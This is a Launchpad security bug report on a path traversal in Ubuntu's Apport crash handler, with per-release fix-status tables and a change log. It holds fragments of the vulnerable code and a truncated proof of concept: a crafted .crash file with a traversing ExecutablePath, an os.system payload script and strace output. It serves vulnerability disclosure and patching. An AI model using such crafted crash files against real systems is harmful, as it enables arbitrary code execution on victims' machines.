Code execution through path traversal in .crash files processing
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Apport |
Fix Released
|
High
|
Unassigned | ||
apport (Ubuntu) |
Fix Released
|
High
|
Brian Murray | ||
Trusty |
Fix Released
|
High
|
Unassigned | ||
Xenial |
Fix Released
|
High
|
Unassigned | ||
Yakkety |
Fix Released
|
High
|
Unassigned | ||
Zesty |
Fix Released
|
High
|
Unassigned | ||
Artful |
Fix Released
|
High
|
Brian Murray |
Bug Description
The function add_hooks_info in apport/report.py is vulnerable to a directory traversal when processing the ExecutablePath key of a malicious .crash file:
opt_path = None
if self.get(
elif package:
# check package contents
try:
for f in apport.
except ValueError:
# uninstalled package
if opt_path:
while len(opt_path) >= len(_opt_dir):
This can be used to execute an arbitrary python script from an attacker controlled path when a crash file is opened:
fwilhelm@box:~$ cat poc.crash
ProblemType: Bug
ExecutablePath: /opt/..
Package: f
fwilhelm@box:~$ cat /tmp/poc/
import os
os.system(
fwilhelm@bpx:~$ strace -eprocess -f /usr/share/
[pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-
[pid 62617] execve(
The sub directory requirement makes this a bit tricky to exploit remotely, but depending on the environment a malicious USB drive, a shared NFS share or a crash file inside an archive could be used.
Please credit Felix Wilhelm from the Google Security Team in all releases, patches and advisories related to these issues.
CVE References
Changed in apport (Ubuntu Trusty): | |
status: | New → Confirmed |
Changed in apport (Ubuntu Xenial): | |
status: | New → Confirmed |
Changed in apport (Ubuntu Yakkety): | |
status: | New → Confirmed |
Changed in apport (Ubuntu Zesty): | |
status: | New → Confirmed |
Changed in apport (Ubuntu Artful): | |
status: | New → Confirmed |
Changed in apport (Ubuntu Trusty): | |
importance: | Undecided → High |
Changed in apport (Ubuntu Xenial): | |
importance: | Undecided → High |
Changed in apport (Ubuntu Yakkety): | |
importance: | Undecided → High |
Changed in apport (Ubuntu Zesty): | |
importance: | Undecided → High |
Changed in apport (Ubuntu Artful): | |
importance: | Undecided → High |
Changed in apport: | |
status: | Confirmed → Fix Released |
importance: | Undecided → High |
information type: | Private Security → Public Security |
tags: | added: patch |
Changed in apport (Ubuntu Artful): | |
status: | Confirmed → In Progress |
assignee: | nobody → Brian Murray (brian-murray) |
Hi Felix - thanks for the report! I don't immediately see how an attacker could have control of what Apport uses for ExecutablePath in the crash file. Is there more to your attack than hand crafting a .crash file and running apport-gtk on it or am I missing something here?
Subscribing bdmurray for Ubuntu apport expertise.